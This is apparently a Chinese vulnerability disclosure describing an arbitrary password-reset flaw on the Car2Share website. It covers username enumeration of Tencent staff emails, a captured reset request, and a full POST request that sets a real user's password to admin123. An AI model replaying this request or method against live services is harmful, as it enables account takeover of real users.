Car2Share任意用户密码重置(以腾讯员工账号测试)

首先登录网站

car2share.com.cn 

Car2Share任意用户密码重置(以腾讯员工账号测试)_第1张图片



注册,发现跳至

http://car2share.daihing.com/

Car2Share任意用户密码重置(以腾讯员工账号测试)_第2张图片



忘记密码页面

http://car2share.daihing.com/daimler-main/help/forgetPwd.shtml

在用户名处我爆破出腾讯一些用户

Car2Share任意用户密码重置(以腾讯员工账号测试)_第3张图片



这里用[email protected]做测试

Car2Share任意用户密码重置(以腾讯员工账号测试)_第4张图片



来到第二步,我们点击重新发送邮件并抓包

Car2Share任意用户密码重置(以腾讯员工账号测试)_第5张图片



把画线位置保存下来

Car2Share任意用户密码重置(以腾讯员工账号测试)_第6张图片



然后

POST 

code 区域
http:/car2share.daihing.com/daimler-main/help/forgetPwd3.shtml

password_new1=admin123&password_new2=admin123&accountId=3b84207e5c1e11e48ea90050569b74e0&accountPwResetId=ff8080814d5702f4014d5770b7800017



成功重置密码为admin123

Car2Share任意用户密码重置(以腾讯员工账号测试)_第7张图片


你可能感兴趣的:(Car2Share任意用户密码重置(以腾讯员工账号测试))